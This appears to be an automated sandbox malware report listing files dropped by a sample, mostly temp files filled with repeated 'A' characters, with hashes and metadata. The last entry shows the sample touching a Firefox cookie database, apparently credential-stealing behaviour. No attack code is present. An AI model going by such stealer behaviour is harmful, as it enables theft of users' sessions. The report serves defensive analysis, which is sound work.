                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\nNnzvybxiy.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (3711), with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):3711
                                                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Wttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkr:Y1
                                                                                                                                                                                                                            MD5:F29145AF17F3D73B67837061C6BD115E
                                                                                                                                                                                                                            SHA1:5A0A9B13AFA0A7C316E0D98057DDD1AA17080788
                                                                                                                                                                                                                            SHA-256:8500BE92CDDBE026601F331F7764E4172AB5F32A524D2F16FF8729AE3C96BF9B
                                                                                                                                                                                                                            SHA-512:1C92C833B5333CCA9028AA273FB8F2A53BEB27D374134688D139148544B1A993D70FC49730C09539E377348A1AAD98C4CF32D747679FC686630323EC205A99C9
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmpfxljry.tmp

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\nNnzvybxiy.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (3176), with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):3176
                                                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Wttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk4:Y2
                                                                                                                                                                                                                            MD5:0220D004F63A3B11CB4DED802DDA3C7C
                                                                                                                                                                                                                            SHA1:B2D629FF0A76FABF090049D15532C14A5B8845C1
                                                                                                                                                                                                                            SHA-256:392B08F917E62CA55C89E8909E4946CA3B751D7E31A6D515F3C45610B087F3C9
                                                                                                                                                                                                                            SHA-512:77F7ADFFF6F1973798D79817BDD3E3D1F071129D215896C377F3FADA1B42D5FDF6DE31062236A33568FE45AC963AF9C91AD054C9428CA14F41FAC68604C1A507
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmpgjxv3x.tmp

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\nNnzvybxiy.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1941), with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1941
                                                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Wttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkd:YX
                                                                                                                                                                                                                            MD5:23F4105A08B338E6FF9F4C6BD5FA7AE2
                                                                                                                                                                                                                            SHA1:4DEA7F316CB169DC5DD7CCCE33E6386D8A99FE7F
                                                                                                                                                                                                                            SHA-256:572ABBF0D7A969F00F3227E87D422E4FB48758C36F96BB6D1B2431DDA5DA59A7
                                                                                                                                                                                                                            SHA-512:097BF965EB8DA9D8C3A1EFD4834D2CCE078A7CB79467E5FCB815D352DC1DB58B20810FF252228AD08640D0307E0992E5D1D2243964767CC9C23F96C1CFE9E132
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmpiibyb1.tmp

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\nNnzvybxiy.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1843), with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1843
                                                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Wttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk3:Yh
                                                                                                                                                                                                                            MD5:1C209F53FEF5815A905CD258E7270FB4
                                                                                                                                                                                                                            SHA1:84E711C2B9ED57DA0B3FF081C76C52703FDCF1AD
                                                                                                                                                                                                                            SHA-256:C970802AF29BFB277A5525417D271587B10A8B3FFFD4BA487EA01E5A546C8A91
                                                                                                                                                                                                                            SHA-512:C5D615FDC423D52BBC66973B5F87CBF69B24FEBF5ABE08197F1DCFB327AAE087C3C197531416A3F591CDE9EEAA6B1C77983A4249FAAA3E7EC21F37D55B66D875
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmpjt4c1h.tmp

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\nNnzvybxiy.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2196), with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):2196
                                                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Wttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk0:YS
                                                                                                                                                                                                                            MD5:5C99E3D3F5A385983E2199A38C503F7D
                                                                                                                                                                                                                            SHA1:A4212214FAE54519D09B1B4E31255D5CF03AF971
                                                                                                                                                                                                                            SHA-256:12CDBC9B76A2CE5B1EE8D54D0613E1B6512FE115C8D6625F2A450B002D5A4C02
                                                                                                                                                                                                                            SHA-512:55AF8408F6F2A36B03EC6C38D17410EF7D65DF083883797ECD1CCF6943AA8FC51EAE1099CC44BDA07A18B6270D3FD88A86FF45D113D703DE0CCD9365472F5107
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmplvn0in.tmp

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\nNnzvybxiy.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (3361), with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):3361
                                                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Wttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkx:YL
                                                                                                                                                                                                                            MD5:3DC5E3B00CFE11BDB59D1BEAC0EDA9AF
                                                                                                                                                                                                                            SHA1:600DA5982341463ABABB8A47764738A82F90F992
                                                                                                                                                                                                                            SHA-256:A9025CA4DA8F93E02636CAAE5BF7DC31CFFA97E03374DCE860E15FA1093EAB0D
                                                                                                                                                                                                                            SHA-512:08C16F0C84D3DC835146188D8C897648319E6CA562DF42E0A0F80457E838E3F1BFC018B7377E92678A439D6174D37896BEF1C9D322BD9E44837B1C460B2AA7DF
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmpnadzws.tmp

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\nNnzvybxiy.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2027), with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):2027
                                                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Wttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk/:Yp
                                                                                                                                                                                                                            MD5:9F4A5640D6909BF619888C5CEE303DDD
                                                                                                                                                                                                                            SHA1:650AE557491C9D55DD8A2C0F073826ADC3E03A65
                                                                                                                                                                                                                            SHA-256:6B20058A009295FDD0DEC77278D30BC1F1C544DF4FFC2B9CF77716583B3660C8
                                                                                                                                                                                                                            SHA-512:E6726040CD599A66994FA4EB16E8C72B74CD17206B65DFC8A7465F7A9F23488059F12B5E817CF1F76615B0DD6ABCDC2724151A784FAD8FF7BC466C62EECBE82C
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmpnq23ga.tmp

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\nNnzvybxiy.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2767), with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):2767
                                                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Wttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkb:Yl
                                                                                                                                                                                                                            MD5:E7CB9A3D473727189E7845F90CA1A0F3
                                                                                                                                                                                                                            SHA1:500869A224C4C0808AACC9912FD8068EAA0544C5
                                                                                                                                                                                                                            SHA-256:20F46F4C9586C6EB9220ACB683AD950392E1FD272DCECD98A47AF093E164C623
                                                                                                                                                                                                                            SHA-512:9E879B7CADFF329749085F9BE8CC5A4BB78C2B76CBBF5F8AAB87ADD2EFF246F226071391F298C34EB455FFEE51E7716F6ABAF8D519FCDDD8195A8CAC855FEFD5
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmppzc2tx.tmp

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\nNnzvybxiy.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (3930), with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):3930
                                                                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Wttkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk6:Yo
                                                                                                                                                                                                                            MD5:3D519B4A7DBA62F20D0E2EDD58589900
                                                                                                                                                                                                                            SHA1:F497A03413DA83E272549EE2B657F30286298142
                                                                                                                                                                                                                            SHA-256:AF9F198A5CE66A731A4F14C1759C3C7669AFF050A0221A61CD10577A73DFF5D7
                                                                                                                                                                                                                            SHA-512:2EEEDA56DE7D491597D1E73A0ABC2176D93109B7515DD1B614FA48B3556E13669D681619F1B0645976CB2BD41DC38CD99C81F4A90C680DA39BB92DAF0D6450AE
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

                                                                                                                                                                                                                            C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-shm

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\nNnzvybxiy.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):32768
                                                                                                                                                                                                                            Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                            MD5:B7C14EC6110FA820CA6B65F5AEC85911
